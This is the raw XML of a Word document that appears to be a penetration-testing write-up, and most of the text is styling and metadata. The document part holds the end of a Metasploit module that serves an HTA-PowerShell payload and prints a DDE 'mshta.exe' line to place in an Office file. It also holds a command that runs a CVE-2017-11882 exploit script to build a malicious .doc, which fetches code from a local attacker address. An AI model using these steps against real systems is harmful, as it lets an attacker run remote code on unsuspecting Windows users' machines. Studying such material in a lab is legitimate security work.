                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">        via HTTP from an web server. Currently have not figured out how
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">        to generate a doc.
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="56"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>}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'License'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5"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>MSF_LICENSE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'Arch'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5"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>ARCH_X86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'Platform'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9"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'win'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'Targets'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  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>[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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'Automatic'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>{}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]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  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>]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'DefaultTarget'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2"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>0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))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end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def</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> on_request_uri(cli, _request)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print_status(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>"Delivering payload"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="57"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>p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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> regenerate_payload(cli)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data </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>=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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Msf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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Util</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="45"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>EXE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="64"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>.to_executable_fmt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>(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framework,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5"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>ARCH_X86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'win'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57"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="64"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>.encoded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9"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'hta-psh'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>,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  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>{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67"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>:arch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5"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>ARCH_X86</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="67"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>:platform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9"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'win '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>}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send_response(cli, data, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'Content-Type'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0"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>=&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'application/hta'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>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end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def</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> primer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url </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> get_uri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print_status(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>"Place the following DDE in an MS document:"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>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  print_line(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>"mshta.exe \"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="47"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>#{</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="47"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>\""</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>)
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="59"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="59"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>python2 Command43b_CVE-2017-11882.py -c "mshta http://192.168.254.128:8080/abc" -o test.doc
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>cp /usr/share/metasploit-framework/modules/exploits/windows/smb/CVE_2017_11886.rb shell.rb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6013450" cy="4507865"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="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"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="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YjY5NjYxM2Y0ZWE5MGRmMzQ5M2Q2MTAzODQwYzlkNTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="710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20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table" w:styleId="19">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="1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Hyperlink"/>
    <w:basedOn w:val="22"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="20"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="23">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="22"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paragraph" w:customStyle="1" w:styleId="26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2"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uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="34"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="37"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uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="22"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uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="36"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70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1090</Words>
  <Characters>3256</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3658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2022-08-15T01:48:00Z</dcterms:created>
  <dc:creator>会移动的三百块</dc:creator>
  <cp:lastModifiedBy>会移动的三百块</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-15T01:50:30Z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C38A67EF4D8C4FBFA26BFB286EB50488</vt:lpwstr>
  </property>
</Properties>
</file>